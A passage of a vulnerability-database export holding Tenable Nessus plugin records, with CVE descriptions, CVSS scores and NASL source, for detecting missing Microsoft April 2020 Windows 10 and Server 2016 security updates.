vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n \n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969)\");\n # https://support.microsoft.com/en-us/help/4550930/windows-10-update-kb4550930\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9b9dba94\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4550930.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550930');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550930])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:11:05", "description": "The remote Windows host is missing security update 4550929.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1006, CVE-2020-1017)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000, CVE-2020-1003)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011) \n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0969)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550929: Windows 10 Version 1607 and Windows Server 2016 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0784", "CVE-2020-0821", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550929.NASL", "href": "https://www.tenable.com/plugins/nessus/135468", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135468);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0784\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0940\",\n \"CVE-2020-0942\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1006\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1017\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4550929\");\n script_xref(name:\"MSFT\", value:\"MS20-4550929\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550929: Windows 10 Version 1607 and Windows Server 2016 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550929.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Push Notification Service handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-0940,\n CVE-2020-1006, CVE-2020-1017)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000, CVE-2020-1003)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could\n overwrite files in arbitrary locations with elevated\n permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n \n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969)\");\n # https://support.microsoft.com/en-us/help/4550929/windows-10-update-kb4550929\n script_set_attribute(attribute:\"see_also\", 